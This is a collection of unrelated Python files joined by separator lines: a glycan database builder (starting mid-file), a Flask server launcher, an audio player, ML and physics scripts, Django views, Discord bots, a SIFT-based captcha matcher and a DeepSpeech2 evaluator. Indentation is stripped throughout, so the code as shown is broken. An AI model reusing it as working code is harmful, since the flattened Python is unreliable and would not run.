combo_flist_one = ["xref_key", "xref_id"]
xref_info = []
combo_flist_two = []
n = load_property_objlist(load_obj, in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id = combo_id.split("|")[0]
uniprotkb_ac = main_id.split("-")[0]
xref_key, xref_id = combo_id.split("|")[-2], combo_id.split("|")[-1]
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0]
if xref_url.find("%s") != -1:
xref_url = xref_url % (xref_id)
load_obj[combo_id]["url"] = xref_url
load_obj[combo_id]["database"] = xref_badge
#--> expression
seen_evdn = {}
for sheet_name in ["proteoform_glycosylation_sites_glyconnect",
"proteoform_glycosylation_sites_unicarbkb"]:
if file_name.find(sheet_name) != -1:
prop_name = "expression"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "saccharide")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
if main_id == "":
continue
canon = tmp_row[tmp_fl.index("uniprotkb_canonical_ac")]
tmp_aa_pos = tmp_row[tmp_fl.index("glycosylation_site_uniprotkb")]
tmp_aa_three = tmp_row[tmp_fl.index("amino_acid")]
aa_pos_list = tmp_aa_pos.split("|")
aa_three_list = tmp_aa_three.split("|")
aa_pos = aa_pos_list[0]
aa_three = aa_three_list[0]
if aa_pos == "":
continue
abundance, tissue_name, uberon_id = "", "", ""
if "source_tissue_uberon_id" in tmp_fl:
tissue_name = tmp_row[tmp_fl.index("source_tissue_name")]
uberon_id = tmp_row[tmp_fl.index("source_tissue_uberon_id")]
if "abundance" in tmp_fl:
abundance = tmp_row[tmp_fl.index("abundance")]
cl_name, cl_id = "", ""
if "source_cell_line_cellosaurus_id" in tmp_fl:
cl_name = tmp_row[tmp_fl.index("source_cell_line_name")]
cl_id = tmp_row[tmp_fl.index("source_cell_line_cellosaurus_id")]
if "cellosaurus_id" in tmp_fl:
cl_name = tmp_row[tmp_fl.index("cellosuaurus_cell_line_name")]
cl_id = tmp_row[tmp_fl.index("cellosaurus_id")]
src_xref_key = tmp_row[tmp_fl.index("src_xref_key")]
src_xref_id = tmp_row[tmp_fl.index("src_xref_id")]
if src_xref_key == "protein_xref_glyconnect":
src_xref_key = "glycan_xref_glyconnect"
src_xref_id = tmp_row[tmp_fl.index("structure_id")]
src_xref_badge = map_dict["xrefkey2badge"][src_xref_key][0]
src_xref_url = map_dict["xrefkey2url"][src_xref_key][0] % (src_xref_id)
xref_key = tmp_row[tmp_fl.index("xref_key")]
xref_id = tmp_row[tmp_fl.index("xref_id")]
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
combo_id = "%s|%s|%s|%s|%s" % (main_id,canon,aa_pos,uberon_id,abundance)
if combo_id not in load_obj["seen"]:
print ("Robel", combo_id)
cl_key = "glycan_xref_cellosaurus"
cl_url = map_dict["xrefkey2url"][cl_key][0] % (cl_id)
cl_obj = {"name": cl_name,"cellosaurus_id":cl_id,"url":cl_url}
cl_obj = cl_obj if cl_id not in ["", "0"] else {}
uberon_key = "glycan_xref_uberon"
uberon_url = map_dict["xrefkey2url"][uberon_key][0] % (uberon_id)
tissue_obj = {
"name":tissue_name,
"uberon":uberon_id.replace("UBERON_",""),
"url":uberon_url
}
tissue_obj = tissue_obj if uberon_id != "" else {}
load_obj[combo_id] = {
"uniprot_canonical_ac":canon,
"start_pos":int(aa_pos),
"end_pos":int(aa_pos),
"residue":aa_three,
"tissue":tissue_obj,
"cell_line":cl_obj,
"abundance":abundance,
"evidence":[
{"id":src_xref_id, "database":src_xref_badge,
"url":src_xref_url}
]
}
if len(aa_pos_list) > 1:
load_obj[combo_id]["alternate_start_pos_list"] = []
load_obj[combo_id]["alternate_end_pos_list"] = []
for tmp_aa_pos in aa_pos_list[1:]:
p = int(tmp_aa_pos)
load_obj[combo_id]["alternate_start_pos_list"].append(p)
load_obj[combo_id]["alternate_end_pos_list"].append(p)
if len(aa_three_list) > 1:
load_obj[combo_id]["alternate_residue"] = aa_three_list[1:]
load_obj["seen"][combo_id] = True
evdn_combo = "%s|%s|%s|%s|%s|%s"%(main_id,canon,aa_pos,uberon_id,src_xref_key,src_xref_id)
load_obj["seen"][evdn_combo] = True
evdn_row_list = [
[src_xref_key,src_xref_id],
[xref_key,xref_id]
]
for evdn_row in evdn_row_list:
x_key, x_id = evdn_row[0], evdn_row[1]
x_badge = map_dict["xrefkey2badge"][x_key][0]
x_url = map_dict["xrefkey2url"][x_key][0] % (x_id)
evdn_combo = "%s|%s|%s|%s|%s|%s"%(main_id,canon,aa_pos,uberon_id,x_key,x_id)
if evdn_combo not in load_obj["seen"]:
ev_obj = {"id":x_id, "database":x_badge, "url":x_url}
load_obj[combo_id]["evidence"].append(ev_obj)
load_obj["seen"][evdn_combo] = True
#--> composition (both composition and composition_advanced used advanced dataset)
for sheet_name in ["glycan_monosaccharide_composition_advanced"]:
if file_name.find(sheet_name) != -1:
prop_name = "composition_expanded"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
type_combo_list = []
for tmp_row in data_frame["data"][main_id]:
for residue in map_dict["residue2name"]:
if residue not in tmp_fl:
continue
n = int(tmp_row[tmp_fl.index(residue)])
name = map_dict["residue2name"][residue][0]
cid = map_dict["residue2cid"][residue][0]
residue = "other" if residue.lower() == "xxx" else residue.lower()
o = {"name":name, "residue":residue, "count":n}
if cid != "" and cid != "0":
url = map_dict["xrefkey2url"]["glycan_xref_monosaccharide_residue_name"][0] % (cid)
o = {"name":name, "residue":residue, "count":n, "cid":cid, "url":url}
combo_id = "%s|%s|%s" % (main_id, residue, cid)
load_obj[combo_id] = o
combo_list = ["glytoucan_ac", "residue"]
update_record_stat(record_stat, file_name, prop_name, len(load_obj.keys()), combo_list)
#--> composition_advanced
for sheet_name in ["glycan_monosaccharide_composition_advanced"]:
if file_name.find(sheet_name) != -1:
prop_name = "composition"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
type_combo_list = []
for tmp_row in data_frame["data"][main_id]:
class_count = {}
for residue in map_dict["residue2name"]:
if residue not in tmp_fl:
continue
#consider only top level residues
if residue not in residue_heirarchy:
continue
r_class = residue
n = int(tmp_row[tmp_fl.index(residue)])
class_count[r_class] = n
for r_class in class_count:
n = class_count[r_class]
r_class_name = map_dict["residue2name"][r_class][0]
cid = map_dict["residue2cid"][r_class][0]
r_class = "other" if r_class.lower() == "xxx" else r_class.lower()
o = {"name":r_class_name, "residue":r_class, "count":n}
if cid != "" or cid != "0":
url = map_dict["xrefkey2url"]["glycan_xref_monosaccharide_residue_name"][0] % (cid)
o = {"name":r_class_name, "residue":r_class, "count":n, "cid":cid, "url":url}
combo_id = "%s|%s|%s" % (main_id, r_class, cid)
load_obj[combo_id] = o
combo_list = ["glytoucan_ac", "residue"]
update_record_stat(record_stat, file_name, prop_name, len(load_obj.keys()), combo_list)
#--> classification
for sheet_name in ["glycan_classification"]:
if file_name.find(sheet_name) != -1:
prop_name = "classification"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
type_combo_list = []
for tmp_row in data_frame["data"][main_id]:
g_type = tmp_row[tmp_fl.index("glycan_type")].strip()
g_subtype = tmp_row[tmp_fl.index("glycan_subtype")].strip()
g_type = "Other" if g_type == "" else g_type
g_subtype = "Other" if g_subtype == "" else g_subtype
type_combo_list.append("%s|%s" % (g_type, g_subtype))
type_combo_list = sorted(set(type_combo_list))
if len(type_combo_list) == 1:
glycan_type, glycan_subtype = type_combo_list[0].split("|")
t_tag = map_dict["subtypetags"][glycan_type][0] if glycan_type in map_dict["subtypetags"] else "xxx"
type_url = map_dict["xrefkey2url"]["glycan_xref_glycan_type"][0] % (t_tag)
o = {"type":{"name":glycan_type, "url":type_url}}
if t_tag == "xxx":
o["type"].pop("url")
if glycan_subtype != "no subtype":
s_tag = map_dict["subtypetags"][glycan_subtype][0] if glycan_subtype in map_dict["subtypetags"] else "xxx"
subtype_url = map_dict["xrefkey2url"]["glycan_xref_glycan_type"][0] % (s_tag)
o["subtype"] = {"name":glycan_subtype, "url":subtype_url}
if s_tag == "xxx":
o["subtype"].pop("url")
combo_id = "%s|%s|%s" % (main_id, glycan_type, glycan_subtype)
load_obj[combo_id] = o
else:
for type_combo in type_combo_list:
glycan_type, glycan_subtype = type_combo.split("|")
if glycan_subtype == "no subtype":
continue
t_tag = map_dict["subtypetags"][glycan_type][0] if glycan_type in map_dict["subtypetags"] else "xxx"
type_url = map_dict["xrefkey2url"]["glycan_xref_glycan_type"][0] % (t_tag)
s_tag = map_dict["subtypetags"][glycan_subtype][0] if glycan_subtype in map_dict["subtypetags"] else "xxx"
subtype_url = map_dict["xrefkey2url"]["glycan_xref_glycan_type"][0] % (s_tag)
o = {
"type":{"name":glycan_type, "url":type_url}
,"subtype":{"name":glycan_subtype, "url":subtype_url}
}
if t_tag == "xxx":
o["type"].pop("url")
if s_tag == "xxx":
o["subtype"].pop("url")
combo_id = "%s|%s|%s" % (main_id, glycan_type, glycan_subtype)
load_obj[combo_id] = o
combo_list = ["glytoucan_ac", "glycan_type", "glycan_subtype"]
update_record_stat(record_stat, file_name, prop_name, len(load_obj.keys()), combo_list)
tmp_dict = {}
for main_id in main_dict["glytoucan_ac"]:
tmp_dict[main_id] = {}
for sec in sec_info:
if sec_info[sec]["category"] in ["string"]:
tmp_dict[main_id][sec] = ""
elif sec_info[sec]["category"] in ["float"]:
tmp_dict[main_id][sec] = 0.0
elif sec_info[sec]["category"] in ["int"]:
tmp_dict[main_id][sec] = 0
elif sec_info[sec]["category"] in ["obj"]:
tmp_dict[main_id][sec] = {}
elif sec_info[sec]["category"] in ["list", "objlist"]:
tmp_dict[main_id][sec] = []
for sec in main_dict:
if type(main_dict[sec]) is dict:
if "seen" in main_dict[sec]:
main_dict[sec].pop("seen")
for combo_id in main_dict[sec]:
main_id = combo_id.split("|")[0]
if main_id not in tmp_dict:
continue
if sec_info[sec]["category"] in ["string", "int", "float", "list", "obj"]:
tmp_dict[main_id][sec] = main_dict[sec][combo_id]
elif sec_info[sec]["category"] in ["objlist"]:
o = main_dict[sec][combo_id]
if "deleteflag" not in o:
tmp_dict[main_id][sec].append(o)
record_count = 0
for main_id in tmp_dict:
if main_id == "seen":
continue
#if main_id in motif_glytoucan_ac_list:
# continue
out_file = path_obj["jsondbpath"] + "/glycandb/%s.json" % (main_id)
obj = tmp_dict[main_id]
if obj["classification"] == []:
o = {"type":{"name":"Other", "url":""}, "subtype":{"name":"Other", "url":""}}
obj["classification"] = [o]
for k in ["mass", "mass_pme", "number_monosaccharides"]:
if obj[k] == 0.0 or obj[k] == 0:
obj.pop(k)
obj["tool_support"] = {"gnome":"no","sandbox":"no"}
if "mass" in obj:
obj["tool_support"]["gnome"] = "yes"
for xobj in obj["crossref"]:
if xobj["database"] == "SandBox":
obj["tool_support"]["sandbox"] = "yes"
break
with open(out_file, "w") as FW:
FW.write("%s\n" % (json.dumps(obj, indent=4)))
record_count += 1
print ("make-glycandb: final filtered in: %s glycan objects" % (record_count))
out_file = path_obj["jsondbpath"] + "/logs/glycandb.json"
with open(out_file, "w") as FW:
FW.write("%s\n" % (json.dumps(record_stat, indent=4)))
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#
# Copyright 2012, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from flask import request
from gevent.pywsgi import WSGIServer
from opencenter.db.database import init_db
from opencenter.webapp import WebServer
from opencenter.webapp.auth import is_allowed, authenticate
def main():
server = WebServer("opencenter",
argv=sys.argv[1:],
configfile='local.conf',
debug=True)
@server.after_request
def allow_cors(response):
if 'cors_uri' in server.config and \
'Origin' in request.headers and \
request.headers['Origin'] in server.config['cors_uri']:
response.headers['Access-Control-Allow-Origin'] = \
request.headers['Origin']
response.headers['Access-Control-Allow-Methods'] = \
'HEAD,GET,PUT,POST,OPTIONS,DELETE'
response.headers['Access-Control-Allow-Headers'] = \
'Content-Type'
return response
@server.before_request
def auth_f():
if not is_allowed(roles=None):
return authenticate()
init_db(server.config['database_uri'])
if 'key_file' in server.config and 'cert_file' in server.config:
import ssl
verification = ssl.CERT_NONE
ca_certs = None
if 'ca_cert' in server.config:
ca_certs = [server.config['ca_cert']]
verification = ssl.CERT_OPTIONAL
http_server = WSGIServer(
(server.config['bind_address'], int(server.config['bind_port'])),
server,
keyfile=server.config['key_file'],
certfile=server.config['cert_file'],
cert_reqs=verification,
ca_certs=ca_certs)
else:
http_server = WSGIServer((server.config['bind_address'],
int(server.config['bind_port'])), server)
http_server.serve_forever()
|
"""
- Reproductor de audio con parametros automaticos
- Seminario de Computacion
- Semana Tecnologica
- Alvaro Araujo
"""
import pyaudio
import wave
import sys
import os
import numpy as np
_format = pyaudio.paInt16
_channels = 2
_rate = 44100
_chunk = 2048
max_v = 2**16
lon_bar = 60
if len(sys.argv) < 2:
print("Syntax: %s entrada.wav" % sys.argv[0])
sys.exit(-1)
wf = wave.open(sys.argv[1], 'rb')
audio = pyaudio.PyAudio()
stream = audio.open(format=audio.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
os.system("clear")
data = wf.readframes(_chunk)
while len(data) > 0:
stream.write(data)
data_num = np.fromstring(data,dtype=np.int16)
data_num_l = data_num[0::2]
data_num_r = data_num[1::2]
data = wf.readframes(_chunk)
if(len(data_num_l)==0 or len(data_num_r)==0):
break
cant_l = np.abs(int(np.max(data_num_l)) - int(np.min(data_num_l)))/int(max_v);
cant_r = np.abs(int(np.max(data_num_r)) - int(np.min(data_num_r)))/int(max_v);
bar_l = "|" * int(cant_l * lon_bar) + " " * int(lon_bar - cant_l * lon_bar)
bar_r = "|" * int(cant_r * lon_bar) + " " * int(lon_bar - cant_r * lon_bar)
print("L=[%s] R=[%s]" % (bar_l, bar_r))
stream.stop_stream()
stream.close()
audio.terminate()
|
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score
from src.utils import load_data
X_train, X_test, y_train, y_test = load_data()
model = GaussianNB()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print("Scikit-learn GaussianNB accuracy: {0:.3f}".format(accuracy_score(y_test, y_pred)))
|
#!/usr/bin/env python
import os
import sys
import commands
import subprocess
from time import time
###-------------------------------------------------------------------###
def oldRemove(label="", ana="anaPlots"):
cmd = []
c = commands.getstatusoutput("ls ../haddOut/out%s_%s.root" % (label, ana))
if "No such file" not in c[1]:
cmd.append("rm")
cmd.append("-v")
cmd.append("../haddOut/out%s_%s.root" % (label, ana))
if query_yes_no("Remove out%s_%s.root" % (label, ana)):
subprocess.call(cmd)
cmd = []
###-------------------------------------------------------------------###
def doHadd(fList=None, label="", ana="anaPlots"):
print "\n >>> Doing hadd for %s"%(label)
cmd = []
cmd.append("hadd")
cmd.append("-v")
cmd.append("1")
# cmd.append("-f")
cmd.append("../haddOut/out%s_%s.root"%(label, ana))
for i in fList:
cmd.append(i)
subprocess.call(cmd)
###-------------------------------------------------------------------###
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes":True, "y":True, "ye":True,
"no":False, "n":False}
if default == None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
###-------------------------------------------------------------------###
def main():
baseTime = time()
parDir = sys.argv[1]
lsOut = []
samps = {
"WJets": ["WJet", "wj_lv_"],
"QCD": ["_QCD_"],
"ZJets": ["ZJets"],
"SinTop": ["_T_", "_Tbar_"],
"DiBoson": ["_ZZ_", "_WW_", "_WZ_"],
"TTbar": ["_TT_CT10_"],
"DY": ["DYJets"],
"Photon": ["GJets"],
}
haddDict = {}
for key, val in samps.iteritems():
oldRemove(key)
tmp = commands.getstatusoutput("ls %s/*/*%s*.root" % (parDir, val[0]))
if tmp[0]==0:
haddDict[key] = tmp[1].split("\n")
for s in haddDict:
doHadd(haddDict[s], s, ana="isoTrackPlots")
###-------------------------------------------------------------------###
###-------------------------------------------------------------------###
if __name__=='__main__':
if len(sys.argv)>1:
main()
else:
print "\n >>> Error: Pass a directory as an arguement."
print "\te.g. './hadd MC.py <dirPath>'\n"
|
# Copyright (c) 2011-2015 Berkeley Model United Nations. All rights reserved.
# Use of this source code is governed by a BSD License (see LICENSE).
import datetime
from easy_pdf.views import PDFTemplateView
from easy_pdf.rendering import render_to_pdf_response
from django.conf import settings
from django.http import Http404
from django.template import Context
from rest_framework import generics, status
from rest_framework.authentication import SessionAuthentication
from rest_framework.response import Response
from huxley.api.mixins import ListUpdateModelMixin
from huxley.api.permissions import IsAdvisorOrSuperuser, IsSchoolAdvisorOrSuperuser
from huxley.api.serializers import AssignmentSerializer, DelegateSerializer, SchoolSerializer
from huxley.core.models import Assignment, Conference, Delegate, School
class SchoolList(generics.CreateAPIView):
authentication_classes = (SessionAuthentication,)
queryset = School.objects.all()
serializer_class = SchoolSerializer
class SchoolDetail(generics.RetrieveUpdateDestroyAPIView):
authentication_classes = (SessionAuthentication,)
queryset = School.objects.all()
serializer_class = SchoolSerializer
permission_classes = (IsAdvisorOrSuperuser,)
def put(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class SchoolAssignments(generics.ListAPIView):
authentication_classes = (SessionAuthentication,)
serializer_class = AssignmentSerializer
permission_classes = (IsSchoolAdvisorOrSuperuser,)
def get_queryset(self):
'''Filter schools by the given pk param.'''
school_id = self.kwargs.get('pk', None)
if not school_id:
raise Http404
return Assignment.objects.filter(school_id=school_id)
class SchoolDelegates(generics.ListAPIView, ListUpdateModelMixin):
authentication_classes = (SessionAuthentication,)
serializer_class = DelegateSerializer
permission_classes = (IsSchoolAdvisorOrSuperuser,)
def get_queryset(self):
'''Filter schools by the given pk param.'''
school_id = self.kwargs.get('pk', None)
if not school_id:
raise Http404
return Delegate.objects.filter(school_id=school_id)
def put(self, request, *args, **kwargs):
return self.list_update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.list_update(request, partial=True, *args, **kwargs)
class SchoolInvoice(PDFTemplateView):
def get(self, request, *args, **kwargs):
template_name = "invoice.html"
conference = Conference.get_current()
school = School.objects.get(pk=kwargs['pk'])
due_date = school.registered + datetime.timedelta(days=21)
delegate_total = sum((
school.beginner_delegates,
school.intermediate_delegates,
school.advanced_delegates,
))
delegate_fee = conference.delegate_fee
delegate_fees = delegate_total*delegate_fee
fees_owed = school.fees_owed
fees_paid = school.fees_paid
amount_due = fees_owed - fees_paid
context = Context({
"name": school.name,
"date_registered": school.registered.strftime("%m/%d/%y"),
"due_date": due_date.strftime("%m/%d/%y"),
"delegate_total": delegate_total,
"delegate_fee": delegate_fee,
"delegate_fees": delegate_fees,
"registration_fee": conference.registration_fee,
"fees_owed": fees_owed,
"fees_paid": fees_paid,
"amount_due": amount_due})
return render_to_pdf_response(request, template_name, context, **kwargs)
|
import discord
import datetime
TOKEN = input('Введите токен бота: ')
client = discord.Client()
@client.event
async def on_message(message):
flag = False
if message.author == client.user:
return
if "set_timer" in message.content.lower():
hours = int(message.content.lower().split()[2])
minutes = int(message.content.lower().split()[4])
await message.channel.send(f"The timer should start in {hours} hours and {minutes} minutes. ")
date = datetime.datetime.now()
delta = datetime.timedelta(hours=hours, minutes=minutes)
flag = True
if flag:
while True:
if datetime.datetime.now() > date + delta:
await message.channel.send(f'🕒 Time X has come')
flag = False
break
client.run(TOKEN) |
'''
Author: QAlexBall
Description: using sift for captcha
'''
import os
import cv2
import numpy as np
with open('loggings.txt', 'w') as f:
f.truncate()
with open('mappings_test.txt', 'w') as f:
f.truncate()
for x in os.listdir('./train/'):
if x == 'mappings_test.txt':
break
print(str(x))#, end=',')
maps = open("mappings_test.txt", "a")
string1 = str(x) + ','
maps.write(string1)
for j in range(1, 5):
imgname2 = './train/' + str(x) + '/' + str(x) + str(j) + '.jpg'
num_sift = [0, 0, 0, 0, 0, 0, 0, 0, 0]
for i in range(0, 9):
imgname1 = './train/' + str(x) + '/' + str(i) + '.jpg'
## (1) prepare data
img1 = cv2.imread(imgname1)
img2 = cv2.imread(imgname2)
gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
## (2) Create SIFT object
sift = cv2.xfeatures2d.SIFT_create()
## (3) Create flann matcher
matcher = cv2.FlannBasedMatcher(dict(algorithm = 1, trees = 5), {})
## (4) Detect keypoints and compute keypointer descriptors
kpts1, descs1 = sift.detectAndCompute(gray1, None)
kpts2, descs2 = sift.detectAndCompute(gray2, None)
## (5) knnMatch to get Top2
matches = matcher.knnMatch(descs1, descs2, 2)
# Sort by their distance.
matches = sorted(matches, key = lambda x:x[0].distance)
## (6) Ratio test, to get good matches.
good = [m1 for (m1, m2) in matches if m1.distance < 0.75 * m2.distance]
num_sift[i] = len(good)
# find the max_num's index
max_sift = num_sift.index(max(num_sift))
print(max_sift)#end='')
string2 = str(max_sift)
maps.write(string2)
f = open("loggings.txt", 'a')
string = str(x) + str(j)+ str(num_sift) + \
'max:' + str(max_sift) +'\n'
f.write(string)
f.write('\n')
maps.write('\n')
print()
maps.close()
f.close()
|
from discord.ext import commands
import discord
import logging
import config
from cogs import secret
def setup_logger():
logging.basicConfig(filename='bot.log', level=logging.INFO)
class Bot(commands.Bot):
def __init__(self, **kwargs):
super().__init__(command_prefix=commands.when_mentioned_or('!'), **kwargs)
for cog in config.cogs:
try:
self.load_extension(cog)
except Exception as exc:
logging.error('Could not load extension {0} due to {1.__class__.__name__}: {1}'.format(cog, exc))
async def on_ready(self):
logging.info('Logged on as {0} (ID: {0.id})'.format(self.user))
print('Logged on as {0} (ID: {0.id})'.format(self.user))
if __name__ == "__main__":
setup_logger()
bot = Bot()
bot.run(secret.token)
|
qi = int(input())
pc = float(input())/100
qr = int(input())
i = 0
while 0<qi<12000:
qi += qi*pc - qr
i+=1
if qi<0:
print("EXTINCAO")
print(i)
else:
print("LIMITE")
print(i) |
"""Evaluation for DeepSpeech2 model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import distutils.util
import argparse
import gzip
import paddle.v2 as paddle
from data_utils.data import DataGenerator
from model import deep_speech2
from decoder import *
from lm.lm_scorer import LmScorer
from error_rate import wer
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
"--batch_size",
default=100,
type=int,
help="Minibatch size for evaluation. (default: %(default)s)")
parser.add_argument(
"--num_conv_layers",
default=2,
type=int,
help="Convolution layer number. (default: %(default)s)")
parser.add_argument(
"--num_rnn_layers",
default=3,
type=int,
help="RNN layer number. (default: %(default)s)")
parser.add_argument(
"--rnn_layer_size",
default=512,
type=int,
help="RNN layer cell number. (default: %(default)s)")
parser.add_argument(
"--use_gpu",
default=True,
type=distutils.util.strtobool,
help="Use gpu or not. (default: %(default)s)")
parser.add_argument(
"--num_threads_data",
default=multiprocessing.cpu_count(),
type=int,
help="Number of cpu threads for preprocessing data. (default: %(default)s)")
parser.add_argument(
"--num_processes_beam_search",
default=multiprocessing.cpu_count(),
type=int,
help="Number of cpu processes for beam search. (default: %(default)s)")
parser.add_argument(
"--mean_std_filepath",
default='mean_std.npz',
type=str,
help="Manifest path for normalizer. (default: %(default)s)")
parser.add_argument(
"--decode_method",
default='beam_search',
type=str,
help="Method for ctc decoding, best_path or beam_search. (default: %(default)s)"
)
parser.add_argument(
"--language_model_path",
default="lm/data/common_crawl_00.prune01111.trie.klm",
type=str,
help="Path for language model. (default: %(default)s)")
parser.add_argument(
"--alpha",
default=0.26,
type=float,
help="Parameter associated with language model. (default: %(default)f)")
parser.add_argument(
"--beta",
default=0.1,
type=float,
help="Parameter associated with word count. (default: %(default)f)")
parser.add_argument(
"--cutoff_prob",
default=0.99,
type=float,
help="The cutoff probability of pruning"
"in beam search. (default: %(default)f)")
parser.add_argument(
"--beam_size",
default=500,
type=int,
help="Width for beam search decoding. (default: %(default)d)")
parser.add_argument(
"--specgram_type",
default='linear',
type=str,
help="Feature type of audio data: 'linear' (power spectrum)"
" or 'mfcc'. (default: %(default)s)")
parser.add_argument(
"--decode_manifest_path",
default='datasets/manifest.test',
type=str,
help="Manifest path for decoding. (default: %(default)s)")
parser.add_argument(
"--model_filepath",
default='checkpoints/params.latest.tar.gz',
type=str,
help="Model filepath. (default: %(default)s)")
parser.add_argument(
"--vocab_filepath",
default='datasets/vocab/eng_vocab.txt',
type=str,
help="Vocabulary filepath. (default: %(default)s)")
args = parser.parse_args()
def evaluate():
"""Evaluate on whole test data for DeepSpeech2."""
# initialize data generator
data_generator = DataGenerator(
vocab_filepath=args.vocab_filepath,
mean_std_filepath=args.mean_std_filepath,
augmentation_config='{}',
specgram_type=args.specgram_type,
num_threads=args.num_threads_data)
# create network config
# paddle.data_type.dense_array is used for variable batch input.
# The size 161 * 161 is only an placeholder value and the real shape
# of input batch data will be induced during training.
audio_data = paddle.layer.data(
name="audio_spectrogram", type=paddle.data_type.dense_array(161 * 161))
text_data = paddle.layer.data(
name="transcript_text",
type=paddle.data_type.integer_value_sequence(data_generator.vocab_size))
output_probs = deep_speech2(
audio_data=audio_data,
text_data=text_data,
dict_size=data_generator.vocab_size,
num_conv_layers=args.num_conv_layers,
num_rnn_layers=args.num_rnn_layers,
rnn_size=args.rnn_layer_size,
is_inference=True)
# load parameters
parameters = paddle.parameters.Parameters.from_tar(
gzip.open(args.model_filepath))
# prepare infer data
batch_reader = data_generator.batch_reader_creator(
manifest_path=args.decode_manifest_path,
batch_size=args.batch_size,
min_batch_size=1,
sortagrad=False,
shuffle_method=None)
# define inferer
inferer = paddle.inference.Inference(
output_layer=output_probs, parameters=parameters)
# initialize external scorer for beam search decoding
if args.decode_method == 'beam_search':
ext_scorer = LmScorer(args.alpha, args.beta, args.language_model_path)
wer_counter, wer_sum = 0, 0.0
for infer_data in batch_reader():
# run inference
infer_results = inferer.infer(input=infer_data)
num_steps = len(infer_results) // len(infer_data)
probs_split = [
infer_results[i * num_steps:(i + 1) * num_steps]
for i in xrange(0, len(infer_data))
]
# target transcription
target_transcription = [
''.join([
data_generator.vocab_list[index] for index in infer_data[i][1]
]) for i, probs in enumerate(probs_split)
]
# decode and print
# best path decode
if args.decode_method == "best_path":
for i, probs in enumerate(probs_split):
output_transcription = ctc_best_path_decoder(
probs_seq=probs, vocabulary=data_generator.vocab_list)
wer_sum += wer(target_transcription[i], output_transcription)
wer_counter += 1
# beam search decode
elif args.decode_method == "beam_search":
# beam search using multiple processes
beam_search_results = ctc_beam_search_decoder_batch(
probs_split=probs_split,
vocabulary=data_generator.vocab_list,
beam_size=args.beam_size,
blank_id=len(data_generator.vocab_list),
num_processes=args.num_processes_beam_search,
ext_scoring_func=ext_scorer,
cutoff_prob=args.cutoff_prob, )
for i, beam_search_result in enumerate(beam_search_results):
wer_sum += wer(target_transcription[i],
beam_search_result[0][1])
wer_counter += 1
else:
raise ValueError("Decoding method [%s] is not supported." %
decode_method)
print("Final WER = %f" % (wer_sum / wer_counter))
def main():
paddle.init(use_gpu=args.use_gpu, trainer_count=1)
evaluate()
if __name__ == '__main__':
main()
|
import os
import sys
project_dir = os.path.join(os.path.dirname(__file__), "..")
sys.path.insert(0, project_dir)
os.environ['PATH'] += os.pathsep + project_dir
from pathlib import Path
class ActionType:
CO_EXISTING = "co-existing"
CO_OPERATION = "co-operating"
COMBINED = "combined"
NOISE = "noise"
def reset_tf():
import tensorflow as tf
tf.reset_default_graph()
# tf.flags.FLAGS.remove_flag_values(tf.flags.FLAGS.flag_values_dict())
# tf.flags.FLAGS.__delattr__()
#
# def del_all_flags(FLAGS):
# flags_dict = FLAGS._flags()
# keys_list = [keys for keys in flags_dict]
# for keys in keys_list:
# FLAGS.__delattr__(keys)
#
# del_all_flags(tf.flags.FLAGS)
BLENDER_OR_OPENSCAD_PATH = r"D:\Program Files\Blender 2.92" # None
if BLENDER_OR_OPENSCAD_PATH is not None:
import sys, os
sys.path.insert(0, BLENDER_OR_OPENSCAD_PATH)
os.environ['PATH'] += os.pathsep + BLENDER_OR_OPENSCAD_PATH
config_root_dir = os.path.dirname(os.path.abspath(__file__)) # added
# for any parameter related mogaze data 'MOGAZE' is mentioned in the variable name
# set whether to consider goal input for prednet_run
AVOID_GOAL = False
# Hyperparameter
LEARNING_RATE = 0.001
